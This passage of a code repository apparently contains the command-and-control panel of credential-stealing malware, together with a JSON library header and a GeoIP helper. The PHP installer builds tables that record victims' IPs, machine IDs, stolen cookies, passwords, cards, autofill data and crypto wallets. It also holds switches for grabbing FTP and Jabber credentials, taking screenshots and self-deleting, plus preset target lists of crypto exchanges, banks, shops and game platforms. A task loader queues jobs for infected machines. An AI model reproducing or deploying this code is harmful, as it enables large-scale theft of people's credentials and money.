json_serialize_to_string and json_serialize_to_string_pretty */ 94 | 95 | /* Comparing */ 96 | int json_value_equals(const JSON_Value *a, const JSON_Value *b); 97 | 98 | /* Validation 99 | This is *NOT* JSON Schema. It validates json by checking if object have identically 100 | named fields with matching types. 
101 | For example schema {"name":"", "age":0} will validate 102 | {"name":"Joe", "age":25} and {"name":"Joe", "age":25, "gender":"m"}, 103 | but not {"name":"Joe"} or {"name":"Joe", "age":"Cucumber"}. 104 | In case of arrays, only first value in schema is checked against all values in tested array. 105 | Empty objects ({}) validate all objects, empty arrays ([]) validate all arrays, 106 | null validates values of every type. 107 | */ 108 | JSON_Status json_validate(const JSON_Value *schema, const JSON_Value *value); 109 | 110 | /* 111 | * JSON Object 112 | */ 113 | JSON_Value * json_object_get_value (const JSON_Object *object, const char *name); 114 | const char * json_object_get_string (const JSON_Object *object, const char *name); 115 | JSON_Object * json_object_get_object (const JSON_Object *object, const char *name); 116 | JSON_Array * json_object_get_array (const JSON_Object *object, const char *name); 117 | double json_object_get_number (const JSON_Object *object, const char *name); /* returns 0 on fail */ 118 | int json_object_get_boolean(const JSON_Object *object, const char *name); /* returns -1 on fail */ 119 | 120 | /* dotget functions enable addressing values with dot notation in nested objects, 121 | just like in structs or c++/java/c# objects (e.g. objectA.objectB.value). 122 | Because valid names in JSON can contain dots, some values may be inaccessible 123 | this way. 
*/ 124 | JSON_Value * json_object_dotget_value (const JSON_Object *object, const char *name); 125 | const char * json_object_dotget_string (const JSON_Object *object, const char *name); 126 | JSON_Object * json_object_dotget_object (const JSON_Object *object, const char *name); 127 | JSON_Array * json_object_dotget_array (const JSON_Object *object, const char *name); 128 | double json_object_dotget_number (const JSON_Object *object, const char *name); /* returns 0 on fail */ 129 | int json_object_dotget_boolean(const JSON_Object *object, const char *name); /* returns -1 on fail */ 130 | 131 | /* Functions to get available names */ 132 | size_t json_object_get_count (const JSON_Object *object); 133 | const char * json_object_get_name (const JSON_Object *object, size_t index); 134 | JSON_Value * json_object_get_value_at(const JSON_Object *object, size_t index); 135 | JSON_Value * json_object_get_wrapping_value(const JSON_Object *object); 136 | 137 | /* Functions to check if object has a value with a specific name. Returned value is 1 if object has 138 | * a value and 0 if it doesn't. dothas functions behave exactly like dotget functions. */ 139 | int json_object_has_value (const JSON_Object *object, const char *name); 140 | int json_object_has_value_of_type(const JSON_Object *object, const char *name, JSON_Value_Type type); 141 | 142 | int json_object_dothas_value (const JSON_Object *object, const char *name); 143 | int json_object_dothas_value_of_type(const JSON_Object *object, const char *name, JSON_Value_Type type); 144 | 145 | /* Creates new name-value pair or frees and replaces old value with a new one. 146 | * json_object_set_value does not copy passed value so it shouldn't be freed afterwards. 
*/ 147 | JSON_Status json_object_set_value(JSON_Object *object, const char *name, JSON_Value *value); 148 | JSON_Status json_object_set_string(JSON_Object *object, const char *name, const char *string); 149 | JSON_Status json_object_set_number(JSON_Object *object, const char *name, double number); 150 | JSON_Status json_object_set_boolean(JSON_Object *object, const char *name, int boolean); 151 | JSON_Status json_object_set_null(JSON_Object *object, const char *name); 152 | 153 | /* Works like dotget functions, but creates whole hierarchy if necessary. 154 | * json_object_dotset_value does not copy passed value so it shouldn't be freed afterwards. */ 155 | JSON_Status json_object_dotset_value(JSON_Object *object, const char *name, JSON_Value *value); 156 | JSON_Status json_object_dotset_string(JSON_Object *object, const char *name, const char *string); 157 | JSON_Status json_object_dotset_number(JSON_Object *object, const char *name, double number); 158 | JSON_Status json_object_dotset_boolean(JSON_Object *object, const char *name, int boolean); 159 | JSON_Status json_object_dotset_null(JSON_Object *object, const char *name); 160 | 161 | /* Frees and removes name-value pair */ 162 | JSON_Status json_object_remove(JSON_Object *object, const char *name); 163 | 164 | /* Works like dotget function, but removes name-value pair only on exact match. 
*/ 165 | JSON_Status json_object_dotremove(JSON_Object *object, const char *key); 166 | 167 | /* Removes all name-value pairs in object */ 168 | JSON_Status json_object_clear(JSON_Object *object); 169 | 170 | /* 171 | *JSON Array 172 | */ 173 | JSON_Value * json_array_get_value (const JSON_Array *array, size_t index); 174 | const char * json_array_get_string (const JSON_Array *array, size_t index); 175 | JSON_Object * json_array_get_object (const JSON_Array *array, size_t index); 176 | JSON_Array * json_array_get_array (const JSON_Array *array, size_t index); 177 | double json_array_get_number (const JSON_Array *array, size_t index); /* returns 0 on fail */ 178 | int json_array_get_boolean(const JSON_Array *array, size_t index); /* returns -1 on fail */ 179 | size_t json_array_get_count (const JSON_Array *array); 180 | JSON_Value * json_array_get_wrapping_value(const JSON_Array *array); 181 | 182 | /* Frees and removes value at given index, does nothing and returns JSONFailure if index doesn't exist. 183 | * Order of values in array may change during execution. */ 184 | JSON_Status json_array_remove(JSON_Array *array, size_t i); 185 | 186 | /* Frees and removes from array value at given index and replaces it with given one. 187 | * Does nothing and returns JSONFailure if index doesn't exist. 188 | * json_array_replace_value does not copy passed value so it shouldn't be freed afterwards. 
*/ 189 | JSON_Status json_array_replace_value(JSON_Array *array, size_t i, JSON_Value *value); 190 | JSON_Status json_array_replace_string(JSON_Array *array, size_t i, const char* string); 191 | JSON_Status json_array_replace_number(JSON_Array *array, size_t i, double number); 192 | JSON_Status json_array_replace_boolean(JSON_Array *array, size_t i, int boolean); 193 | JSON_Status json_array_replace_null(JSON_Array *array, size_t i); 194 | 195 | /* Frees and removes all values from array */ 196 | JSON_Status json_array_clear(JSON_Array *array); 197 | 198 | /* Appends new value at the end of array. 199 | * json_array_append_value does not copy passed value so it shouldn't be freed afterwards. */ 200 | JSON_Status json_array_append_value(JSON_Array *array, JSON_Value *value); 201 | JSON_Status json_array_append_string(JSON_Array *array, const char *string); 202 | JSON_Status json_array_append_number(JSON_Array *array, double number); 203 | JSON_Status json_array_append_boolean(JSON_Array *array, int boolean); 204 | JSON_Status json_array_append_null(JSON_Array *array); 205 | 206 | /* 207 | *JSON Value 208 | */ 209 | JSON_Value * json_value_init_object (void); 210 | JSON_Value * json_value_init_array (void); 211 | JSON_Value * json_value_init_string (const char *string); /* copies passed string */ 212 | JSON_Value * json_value_init_number (double number); 213 | JSON_Value * json_value_init_boolean(int boolean); 214 | JSON_Value * json_value_init_null (void); 215 | JSON_Value * json_value_deep_copy (const JSON_Value *value); 216 | void json_value_free (JSON_Value *value); 217 | 218 | JSON_Value_Type json_value_get_type (const JSON_Value *value); 219 | JSON_Object * json_value_get_object (const JSON_Value *value); 220 | JSON_Array * json_value_get_array (const JSON_Value *value); 221 | const char * json_value_get_string (const JSON_Value *value); 222 | double json_value_get_number (const JSON_Value *value); 223 | int json_value_get_boolean(const JSON_Value *value); 224 
| JSON_Value * json_value_get_parent (const JSON_Value *value); 225 | 226 | /* Same as above, but shorter */ 227 | JSON_Value_Type json_type (const JSON_Value *value); 228 | JSON_Object * json_object (const JSON_Value *value); 229 | JSON_Array * json_array (const JSON_Value *value); 230 | const char * json_string (const JSON_Value *value); 231 | double json_number (const JSON_Value *value); 232 | int json_boolean(const JSON_Value *value); 233 | 234 | #ifdef __cplusplus 235 | } 236 | #endif 237 | 238 | #endif 239 | -------------------------------------------------------------------------------- /Panel/loader.php: -------------------------------------------------------------------------------- 1 | exec("INSERT INTO `tasks`(`id`, `name`, `count`, `country`, `task`, `preset`,`params`,`status`) VALUES (null, '$name', '$count', '$country', '$task', '$preset','$str', 0)"); 22 | } 23 | } 24 | if ($delete != null) { 25 | $pdoConnection->exec("DELETE FROM `tasks` WHERE id = '" . formatString($delete) . "'"); 26 | header("Location: loader.php", true, 301); 27 | } 28 | 29 | function formatString($param) 30 | { 31 | $returnString = $param; 32 | $returnString = trim($returnString); 33 | $returnString = stripslashes($returnString); 34 | $returnString = htmlspecialchars($returnString); 35 | 36 | return $returnString; 37 | } 38 | 39 | ?> 40 | 41 | 42 | 43 | 44 | Loader 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 |

Tasks


Tasks

202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | query("SELECT * FROM `tasks`"); 218 | while ($task = $tasks->fetch(PDO::FETCH_ASSOC)) { 219 | if ($task["status"] < $task["count"]) { 220 | $status = ""; 221 | } else if ($task["count"] == 0) { 222 | $status = ""; 223 | } else { 224 | $status = ""; 225 | } 226 | ?> 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 238 | 239 | 242 | 243 |
IDPresetNameParamsCountCountryStatusActions
"> 236 | 237 |
251 | 254 | -------------------------------------------------------------------------------- /Panel/install.php: -------------------------------------------------------------------------------- 1 | '; 39 | 40 | fwrite($config_file, $configuration); 41 | fclose($config_file); 42 | } 43 | 44 | else 45 | { 46 | $error = "Please enter all params!"; 47 | } 48 | try 49 | { 50 | include(dirname(__FILE__)."/database.php"); 51 | } 52 | catch(Exception $e) 53 | { 54 | $error = "Can't connect to database."; 55 | } 56 | if(isset($pdoConnection)) 57 | { 58 | $pdoConnection->exec('SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'); 59 | $pdoConnection->exec('SET time_zone = "+00:00";'); 60 | $pdoConnection->exec('CREATE TABLE `grabber` ( 61 | `id` int(11) NOT NULL, 62 | `name` text NOT NULL, 63 | `folder` text NOT NULL, 64 | `pattern` text NOT NULL, 65 | `exception` text NOT NULL 66 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;'); 67 | $pdoConnection->exec("CREATE TABLE `logs` ( 68 | `id` int(11) NOT NULL, 69 | `userID` text NOT NULL, 70 | `hwid` text NOT NULL, 71 | `system` text NOT NULL, 72 | `ip` text NOT NULL, 73 | `country` text NOT NULL, 74 | `date` text NOT NULL, 75 | `count` int(11) DEFAULT NULL, 76 | `cookie` int(11) DEFAULT NULL, 77 | `pswd` int(11) DEFAULT NULL, 78 | `buildversion` text, 79 | `credit` int(11) DEFAULT '0', 80 | `autofill` int(11) DEFAULT '0', 81 | `wallets` int(11) DEFAULT '0', 82 | `checked` int(11) NOT NULL DEFAULT '0', 83 | `comment` text NOT NULL 84 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;"); 85 | 86 | $pdoConnection->exec("CREATE TABLE `presets` ( 87 | `id` int(11) NOT NULL, 88 | `name` text NOT NULL, 89 | `color` text NOT NULL, 90 | `pattern` text NOT NULL 91 | ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;"); 92 | $pdoConnection->exec("INSERT INTO `presets` (`id`, `name`, `color`, `pattern`) VALUES 93 | (0, 'Crypto', 'MEDIUMVIOLETRED', 
'freewallet.org;paxful.com;capdax.com;wazirx.com;okex.com;bitfinex.com;hitbtc.com;kraken.com;gateio.io;bitstamp.net;bittrex.com;exmo;yobit;poloniex.com;bitflyer.jp;livecoin.net;wex.nz;cryptonator;mercatox.com;localbitcoins.com;localbitcoins.net;luno.;coinpayments;therocktrading.com;etherdelta.com;anxpro.com;c-cex.com;gatecoin.com;kiwi-coin.com;jubi.com;koineks.com;ecoin.cc;koinim.com;litebit.eu;lykke.com;mangr.com;localtrade.pro;lbank.info;leoxchange.com;liqui.io;kuna.io;fybse.se;freiexchange.com;fybsg.com;gatehub.net;getbtc.org;gemini.com;gdax.com;foxbit.com.br;foxbit.exchange;flowbtc.com.br;exx.com;exrates.me;excambriorex.com;ezbtc.ca;fargobase.com;fisco.co.uk;glidera.io;indacoin.com;ethexindia.com;indx.ru;infinitycoin.exchange;idex.su;idex.market;ice3x.com;ice3x.co.za;guldentrader.com;exchange.guldentrader.com;heatwallet.com;hypex.nl;negociecoins.com.br;topbtc.com;tidex.com;tidebit.com;tradesatoshi.com;urdubit.com;tuxexchange.com;tdax.com;spacebtc.com;surbitcoin.com;surbtc.com;usd-x.com;xbtce.com;yunbi.com;zyado.com;trade.z.com;zaif.jp;wavesplatform.com;walltime.info;vbtc.exchange;vaultoro.com;vircurex.com;virtacoinworld.com;vwlpro.com;nlexch.com;nevbit.com;nocks.com;novaexchange.com;nxtplatform.org;neraex.pro;mixcoins.com;mr-ripple.com;dsx.uk;nzbcx.com;okcoin.com;quadrigacx.com;quoinex.com;rightbtc.com;ripplefox.com;rippex.net;openledger.info;paymium.com;paribu.com;mercadobitcoin.com.br;dcexe.com;bitmex.com;bitmaszyna.pl;bitonic.nl;bitpanda.com;bitsblockchain.net;bitmarket.net;bitlish.com;bitfex.trade;bitexbook.com;bitex.la;bitflip.cc;bitgrail.com;bitkan.com;bitinka.com;bitholic.com;bitsane.com;changer.com;bitshares.org;btcmarkets.net;braziliex.com;btc-trade.com.ua;btc-alpha.com;bl3p.eu;bitssa.com;bitspark.io;bitso.com;bitstar.com;ittylicious.com;altcointrader.co.za;arenabitcoin;allcoin.com;abucoins.com;aidosmarket.com;aex.com;acx.com;bancor.network;bitbay.net;indodax.com;bitcointrade.com.br;bitcointoyou.com;bitbanktrade.jp;bitbank.com;big.one;bcex.ru;bitconnect
.co;bisq.network;bit2c.co.il;bit-z.com;btcbear.com;btcbox.in;counterwallet.io;freewallet.io;indiesquare.me;rarepepewallet.com;coss.io;coolcoin.com;crex24.com;cryptex.net;coinut.com;coinsbank.com;coinsecure.in;coinsquare.com;coinsquare.io;coinspot.io;coinmarketcap.com;crypto-bridge.org;dcex.com;dabtc.com;decentrex.com;deribit.com;dgtmarket.com;cryptomkt.com;cryptoderivatives.market;cryptodao.com;cryptomate.co.uk;cryptox.pl;cryptopia.co.nz;coinroom.com;coinrate.net;chbtc.com;chilebit.net;coinbase.com;burst-coin.org;poloniex.com;btcc.;binance;btcc.net;btc-trade.com.ua;btctrade.im;btcturk.com;btcxindia.com;coincheck.com;coinmate.io;coingi.com;coinnest.co.kr;coinrail.co.kr;coinpit.io;coingather.com;coinfloor.co.uk;coinegg.com;coincorner.com;coinexchange.io;coinfalcon.com;digatrade.com;btc-alpha.com;blockchain;minergate;myetherwallet.com;litevault.net;dogechain.info;coinome;bitbns;btc.top;etherdelta.com;btcbank.com.ua;coindelta.com;depotwallet.com;kryptex.org'), 94 | (1, 'Shop', 'green', 'amazon;ebay;walmart;newegg;apple;bestbuy'), 95 | (2, 'Money', 'GOLD', 'paypal;chase.com;TD;wells;capitalone;skrill;PayU'), 96 | (3, 'Game', 'MEDIUMSLATEBLUE', 'steam;origin;ubi.com');"); 97 | 98 | $pdoConnection->exec('CREATE TABLE `settings` ( 99 | `id` int(11) NOT NULL, 100 | `cisLogs` text NOT NULL, 101 | `repeatLogs` text NOT NULL, 102 | `telegram` text NOT NULL, 103 | `history` text NOT NULL, 104 | `autocomplete` text NOT NULL, 105 | `cards` text NOT NULL, 106 | `cookies` text NOT NULL, 107 | `passwords` text NOT NULL, 108 | `jabber` text NOT NULL, 109 | `ftp` text NOT NULL, 110 | `screenshot` text NOT NULL, 111 | `selfDelete` text NOT NULL, 112 | `vpn` text NOT NULL, 113 | `grabber` text NOT NULL, 114 | `executionTime` text NOT NULL 115 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;'); 116 | 117 | $pdoConnection->exec("INSERT INTO `settings` (`id`, `cisLogs`, `repeatLogs`, `telegram`, `history`, `autocomplete`, `cards`, `cookies`, `passwords`, `jabber`, `ftp`, `screenshot`, `selfDelete`, 
`vpn`, `grabber`, `executionTime`) VALUES 118 | (0, 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'on', 'off', '0');"); 119 | 120 | $pdoConnection->exec('CREATE TABLE `tasks` ( 121 | `id` int(11) NOT NULL, 122 | `name` text NOT NULL, 123 | `count` int(11) NOT NULL, 124 | `country` text NOT NULL, 125 | `task` text NOT NULL, 126 | `preset` text NOT NULL, 127 | `params` text NOT NULL, 128 | `status` int(11) NOT NULL 129 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;'); 130 | $pdoConnection->exec('ALTER TABLE `grabber` 131 | ADD PRIMARY KEY (`id`);'); 132 | $pdoConnection->exec('ALTER TABLE `logs` 133 | ADD PRIMARY KEY (`id`);'); 134 | $pdoConnection->exec('ALTER TABLE `presets` 135 | ADD PRIMARY KEY (`id`), 136 | ADD UNIQUE KEY `id` (`id`), 137 | ADD UNIQUE KEY `id_2` (`id`);'); 138 | $pdoConnection->exec('ALTER TABLE `settings` 139 | ADD PRIMARY KEY (`id`);'); 140 | $pdoConnection->exec('ALTER TABLE `tasks` 141 | ADD PRIMARY KEY (`id`);'); 142 | $pdoConnection->exec('ALTER TABLE `grabber` 143 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;'); 144 | $pdoConnection->exec('ALTER TABLE `presets` 145 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=4;'); 146 | $pdoConnection->exec('ALTER TABLE `tasks` 147 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;'); 148 | $pdoConnection->exec('ALTER TABLE `logs` 149 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;'); 150 | $pdoConnection->exec('ALTER TABLE `grabber` 151 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;'); 152 | 153 | header('Location: index.php?install=true', true, 301); 154 | die(); 155 | } 156 | else 157 | { 158 | $error = "Can't connect to database."; 159 | } 160 | } 161 | function checkParam($param) 162 | { 163 | $formatted = $param; 164 | $formatted = trim($formatted); 165 | $formatted = stripslashes($formatted); 166 | $formatted = htmlspecialchars($formatted); 167 | 168 | return $formatted; 169 | } 170 | ?> 171 | 172 | 173 | 174 | 175 | 176 | Install 177 | 178 | 179 | 180 | 181 | 182 | 

Database info


Server info

272 | 273 | 274 | -------------------------------------------------------------------------------- /Panel/assets/GeoIP/geoip.php: -------------------------------------------------------------------------------- 1 | lookupCountryCode($ip); 7 | } 8 | 9 | function ip_name($ip = FALSE){ 10 | $geoip = geo_ip::getInstance(dirname(__FILE__) . "/geoip.dat"); 11 | $ip = $ip == FALSE ? $_SERVER['REMOTE_ADDR'] : $ip; 12 | return $geoip->lookupCountryName($ip); 13 | } 14 | 15 | function ip_img_style($ip = FALSE){ 16 | 17 | include dirname(__FILE__) . "/config.php"; 18 | 19 | $geoip = geo_ip::getInstance(dirname(__FILE__) . "/geoip.dat"); 20 | $ip = $ip == FALSE ? $_SERVER['REMOTE_ADDR'] : $ip; 21 | 22 | $name = str_replace(" ", "_", strtolower($geoip->lookupCountryName($ip))); 23 | 24 | $rel = array('?', 'afghanistan', 'albania', 'algeria', 'american_samoa', 'andorra', 'angola', 'anguilla', 'antigua_and_barbuda', 'argentina', 'armenia', 'aruba', 'australia', 'austria', 'azerbaijan', 'bahamas', 'bahrain', 'bangladesh', 'barbados', 'belarus', 'belgium', 'belize', 'benin', 'bermuda', 'bhutan', 'bolivia', 'bosnia_and_herzegovina', 'botswana', 'brazil', 'british_indian_ocean_territory', 'british_virgin_islands', 'brunei', 'bulgaria', 'burkina_faso', 'burma', 'burundi', 'cambodia', 'cameroon', 'canada', 'cape_verde', 'cayman_islands', 'central_african_republic', 'chad', 'chile', 'china', 'colombia', 'comoros', 'congo_democratic_republic', 'congo_republic', 'cook_islands', 'costa_rica', 'cote_divoire', 'croatia', 'cuba', 'cyprus', 'czech_republic', 'denmark', 'djibouti', 'dominica', 'dominican_republic', 'east_timor', 'egypt', 'el_salvador', 'england', 'equador', 'equatorial_guinea', 'eritrea', 'estonia', 'ethiopia', 'falkland_islands', 'faroe_islands', 'fiji', 'finland', 'france', 'french_polynesia', 'gabon', 'gambia', 'georgia', 'germany', 'ghana', 'gibraltar', 'greece', 'greenland', 'grenada', 'guam', 'guatemala', 'guernsey', 'guinea', 'guinea_bissau', 'guyana', 'haiti', 
'honduras', 'hong_kong', 'hungary', 'iceland', 'india', 'indonesia', 'iran', 'iraq', 'ireland', 'isle_of_man', 'israel', 'italy', 'jamaica', 'japan', 'jersey', 'jordan', 'kazakhstan', 'kenya', 'kiribati', 'kuwait', 'kyrgyzstan', 'laos', 'latvia', 'lebanon', 'lesotho', 'liberia', 'libya', 'liechtenstein', 'lithuania', 'luxembourg', 'macau', 'macedonia', 'madagascar', 'malawi', 'malaysia', 'maledives', 'mali', 'malta', 'marshall_islands', 'martinique', 'mauretania', 'mauritius', 'mexico', 'micronesia', 'moldova', 'monaco', 'mongolia', 'montserrat', 'morocco', 'mozambique', 'namibia', 'nauru', 'nepal', 'netherlands', 'netherlands_antilles', 'new_zealand', 'nicaragua', 'niger', 'nigeria', 'niue', 'norfolk_island', 'north_korea', 'northern_mariana_islands', 'norway', 'oman', 'pakistan', 'palau', 'panama', 'papua_new_guinea', 'paraguay', 'peru', 'philippines', 'pitcairn_islands', 'poland', 'portugal', 'puerto_rico', 'qatar', 'romania', 'russia', 'rwanda', 'saint_helena', 'saint_kitts_and_nevis', 'saint_lucia', 'saint_pierre_and_miquelon', 'saint_vincent_and_the_grenadines', 'samoa', 'san_marino', 'sao_tome_and_principe', 'saudi_arabia', 'scotland', 'senegal', 'serbia_montenegro', 'seychelles', 'sierra_leone', 'singapore', 'slovakia', 'slovenia', 'solomon_islands', 'somalia', 'south_africa', 'south_georgia', 'south_korea', 'spain', 'sri_lanka', 'sudan', 'suriname', 'swaziland', 'sweden', 'switzerland', 'syria', 'taiwan', 'tajikistan', 'tanzania', 'thailand', 'tibet', 'togo', 'tonga', 'trinidad_and_tobago', 'tunisia', 'turkey', 'turkmenistan', 'turks_and_caicos_islands', 'tuvalu', 'uganda', 'ukraine', 'united_arab_emirates', 'united_kingdom', 'uruguay', 'usa', 'uzbekistan', 'vanuatu', 'vatican_city', 'venezuela', 'vietnam', 'virgin_islands', 'wales', 'wallis_and_futuna', 'yemen', 'zambia', 'zimbabwe'); 25 | 26 | return "width: {$w}px; height: {$w}px; background: url({$path}) no-repeat scroll 0px -" . (array_search($name, $rel) * $w) . 
"px transparent;"; 27 | } 28 | 29 | 30 | class geo_ip { 31 | 32 | static $COUNTRY_CODES = array("?", "AP", "EU", "AD", "AE", "AF", "AG", "AI", "AL", "AM", "AN", "AO", "AQ", "AR", "AS", "AT", "AU", "AW", "AZ", "BA", "BB", "BD", "BE", "BF", "BG", "BH", "BI", "BJ", "BM", "BN", "BO", "BR", "BS", "BT", "BV", "BW", "BY", "BZ", "CA", "CC", "CD", "CF", "CG", "CH", "CI", "CK", "CL", "CM", "CN", "CO", "CR", "CU", "CV", "CX", "CY", "CZ", "DE", "DJ", "DK", "DM", "DO", "DZ", "EC", "EE", "EG", "EH", "ER", "ES", "ET", "FI", "FJ", "FK", "FM", "FO", "FR", "FX", "GA", "GB", "GD", "GE", "GF", "GH", "GI", "GL", "GM", "GN", "GP", "GQ", "GR", "GS", "GT", "GU", "GW", "GY", "HK", "HM", "HN", "HR", "HT", "HU", "ID", "IE", "IL", "IN", "IO", "IQ", "IR", "IS", "IT", "JM", "JO", "JP", "KE", "KG", "KH", "KI", "KM", "KN", "KP", "KR", "KW", "KY", "KZ", "LA", "LB", "LC", "LI", "LK", "LR", "LS", "LT", "LU", "LV", "LY", "MA", "MC", "MD", "MG", "MH", "MK", "ML", "MM", "MN", "MO", "MP", "MQ", "MR", "MS", "MT", "MU", "MV", "MW", "MX", "MY", "MZ", "NA", "NC", "NE", "NF", "NG", "NI", "NL", "NO", "NP", "NR", "NU", "NZ", "OM", "PA", "PE", "PF", "PG", "PH", "PK", "PL", "PM", "PN", "PR", "PS", "PT", "PW", "PY", "QA", "RE", "RO", "RU", "RW", "SA", "SB", "SC", "SD", "SE", "SG", "SH", "SI", "SJ", "SK", "SL", "SM", "SN", "SO", "SR", "ST", "SV", "SY", "SZ", "TC", "TD", "TF", "TG", "TH", "TJ", "TK", "TM", "TN", "TO", "TP", "TR", "TT", "TV", "TW", "TZ", "UA", "UG", "UM", "US", "UY", "UZ", "VA", "VC", "VE", "VG", "VI", "VN", "VU", "WF", "WS", "YE", "YT", "YU", "ZA", "ZM", "ZR", "ZW", "A1", "A2", "O1"); 33 | 34 | static $COUNTRY_NAMES = array("?", "Asia/Pacific Region", "Europe", "Andorra", "United Arab Emirates", "Afghanistan", "Antigua and Barbuda", "Anguilla", "Albania", "Armenia", "Netherlands Antilles", "Angola", "Antarctica", "Argentina", "American Samoa", "Austria", "Australia", "Aruba", "Azerbaijan", "Bosnia and Herzegovina", "Barbados", "Bangladesh", "Belgium", "Burkina Faso", "Bulgaria", "Bahrain", 
"Burundi", "Benin", "Bermuda", "Brunei Darussalam", "Bolivia", "Brazil", "Bahamas", "Bhutan", "Bouvet Island", "Botswana", "Belarus", "Belize", "Canada", "Cocos (Keeling) Islands", "Congo, The Democratic Republic of the", "Central African Republic", "Congo", "Switzerland", "Cote Divoire", "Cook Islands", "Chile", "Cameroon", "China", "Colombia", "Costa Rica", "Cuba", "Cape Verde", "Christmas Island", "Cyprus", "Czech Republic", "Germany", "Djibouti", "Denmark", "Dominica", "Dominican Republic", "Algeria", "Ecuador", "Estonia", "Egypt", "Western Sahara", "Eritrea", "Spain", "Ethiopia", "Finland", "Fiji", "Falkland Islands (Malvinas)", "Micronesia, Federated States of", "Faroe Islands", "France", "France, Metropolitan", "Gabon", "United Kingdom", "Grenada", "Georgia", "French Guiana", "Ghana", "Gibraltar", "Greenland", "Gambia", "Guinea", "Guadeloupe", "Equatorial Guinea", "Greece", "South Georgia and the South Sandwich Islands", "Guatemala", "Guam", "Guinea Bissau", "Guyana", "Hong Kong", "Heard Island and McDonald Islands", "Honduras", "Croatia", "Haiti", "Hungary", "Indonesia", "Ireland", "Israel", "India", "British Indian Ocean Territory", "Iraq", "Iran", "Iceland", "Italy", "Jamaica", "Jordan", "Japan", "Kenya", "Kyrgyzstan", "Cambodia", "Kiribati", "Comoros", "Saint Kitts and Nevis", "North Korea", "South Korea", "Kuwait", "Cayman Islands", "Kazakhstan", "Lao People's Democratic Republic", "Lebanon", "Saint Lucia", "Liechtenstein", "Sri Lanka", "Liberia", "Lesotho", "Lithuania", "Luxembourg", "Latvia", "Libyan Arab Jamahiriya", "Morocco", "Monaco", "Moldova", "Madagascar", "Marshall Islands", "Macedonia", "Mali", "Myanmar", "Mongolia", "Macau", "Northern Mariana Islands", "Martinique", "Mauritania", "Montserrat", "Malta", "Mauritius", "Maldives", "Malawi", "Mexico", "Malaysia", "Mozambique", "Namibia", "New Caledonia", "Niger", "Norfolk Island", "Nigeria", "Nicaragua", "Netherlands", "Norway", "Nepal", "Nauru", "Niue", "New Zealand", "Oman", "Panama", "Peru", 
"French Polynesia", "Papua New Guinea", "Philippines", "Pakistan", "Poland", "Saint Pierre and Miquelon", "Pitcairn Islands", "Puerto Rico", "Palestinian Territory, Occupied", "Portugal", "Palau", "Paraguay", "Qatar", "Reunion", "Romania", "Russia", "Rwanda", "Saudi Arabia", "Solomon Islands", "Seychelles", "Sudan", "Sweden", "Singapore", "Saint Helena", "Slovenia", "Svalbard and Jan Mayen", "Slovakia", "Sierra Leone", "San Marino", "Senegal", "Somalia", "Suriname", "Sao Tome and Principe", "El Salvador", "Syria", "Swaziland", "Turks and Caicos Islands", "Chad", "French Southern Territories", "Togo", "Thailand", "Tajikistan", "Tokelau", "Turkmenistan", "Tunisia", "Tonga", "East Timor", "Turkey", "Trinidad and Tobago", "Tuvalu", "Taiwan", "Tanzania, United Republic of", "Ukraine", "Uganda", "United States Minor Outlying Islands", "USA", "Uruguay", "Uzbekistan", "Holy See (Vatican City State)", "Saint Vincent and the Grenadines", "Venezuela", "Virgin Islands, British", "Virgin Islands, U.S.", "Vietnam", "Vanuatu", "Wallis and Futuna", "Samoa", "Yemen", "Mayotte", "Bosnia and Herzegovina", "South Africa", "Zambia", "Democratic Republic Congo", "Zimbabwe", "Anonymous Proxy","Satellite Provider","Other"); 35 | 36 | const STANDARD = 0; 37 | const MEMORY_CACHE = 1; 38 | const SHARED_MEMORY = 2; 39 | const COUNTRY_BEGIN = 16776960; 40 | const STATE_BEGIN_REV0 = 16700000; 41 | const STATE_BEGIN_REV1 = 16000000; 42 | const STRUCTURE_INFO_MAX_SIZE = 20; 43 | const DATABASE_INFO_MAX_SIZE = 100; 44 | const COUNTRY_EDITION = 106; 45 | const REGION_EDITION_REV0 = 112; 46 | const REGION_EDITION_REV1 = 3; 47 | const CITY_EDITION_REV0 = 111; 48 | const CITY_EDITION_REV1 = 2; 49 | const ORG_EDITION = 110; 50 | const SEGMENT_RECORD_LENGTH = 3; 51 | const STANDARD_RECORD_LENGTH = 3; 52 | const ORG_RECORD_LENGTH = 4; 53 | const MAX_RECORD_LENGTH = 4; 54 | const MAX_ORG_RECORD_LENGTH = 300; 55 | const FULL_RECORD_LENGTH = 50; 56 | const US_OFFSET = 1; 57 | const CANADA_OFFSET = 677; 58 | 
const WORLD_OFFSET = 1353; 59 | const FIPS_RANGE = 360; 60 | const SHM_KEY = 0x4f415401; 61 | 62 | private $flags = 0; 63 | private $filehandle; 64 | private $memoryBuffer; 65 | private $databaseType; 66 | private $databaseSegments; 67 | private $recordLength; 68 | private $shmid; 69 | private static $instances = array(); 70 | 71 | function __construct($filename = null, $flags = null) { 72 | if ($filename !== null) { 73 | $this->open($filename, $flags); 74 | } 75 | self::$instances[$filename] = $this; 76 | } 77 | static function getInstance($filename = null, $flags = null) { 78 | if (!isset(self::$instances[$filename])) { 79 | self::$instances[$filename] = new geo_ip($filename, $flags); 80 | } 81 | return self::$instances[$filename]; 82 | } 83 | function open($filename, $flags = null) { 84 | if ($flags !== null) { 85 | $this->flags = $flags; 86 | } 87 | if ($this->flags & self::SHARED_MEMORY) { 88 | $this->shmid = @shmop_open(self::SHM_KEY, "a", 0, 0); 89 | if ($this->shmid === false) { 90 | $this->loadSharedMemory($filename); 91 | $this->shmid = @shmop_open(self::SHM_KEY, "a", 0, 0); 92 | if ($this->shmid === false) { 93 | throw new Exception("Unable to open shared memory at key: " . 
